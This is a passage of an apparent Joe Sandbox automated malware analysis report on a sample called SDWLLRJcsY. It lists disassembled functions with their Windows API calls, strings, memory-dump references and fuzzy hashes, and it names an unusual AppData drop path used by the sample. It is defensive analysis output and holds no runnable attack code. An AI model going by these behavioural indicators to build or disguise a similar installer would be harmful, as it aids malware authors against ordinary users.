                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Close$Enum
                                      • String ID:
                                      • API String ID: 464197530-0
                                      • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                      • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405BD6
                                        • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                        • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                        • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,00000000,000000F0), ref: 0040164D
                                      Strings
                                      • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene, xrefs: 00401640
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                      • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene
                                      • API String ID: 1892508949-2332916965
                                      • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                      • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                      • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                      • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                      Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,0040638E,80000002), ref: 00406160
                                      • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 0040616B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: : Completed
                                      • API String ID: 3356406503-2954849223
                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                      • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                      • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                      Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                      • CloseHandle.KERNEL32(?), ref: 00405867
                                      Strings
                                      • Error launching installer, xrefs: 00405844
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                      • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                      Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                      • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                      Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                      • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                      Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                      • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                      Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                      • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                      Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                      • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                      Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                      • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                      Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                      • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                      Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree
                                      • String ID: Noncyclical
                                      • API String ID: 3394109436-2594171315
                                      • Opcode ID: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                      • Instruction ID: dcb5b8d847a710274197b3f9eb455299827833f010be51817d6ecb77aa41e574
                                      • Opcode Fuzzy Hash: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                      • Instruction Fuzzy Hash: 5021CD72700100EFDB20EBA8CE8495E76B8AF84328725417BF902F72D1DB7D98518B2D
                                      Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                      • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
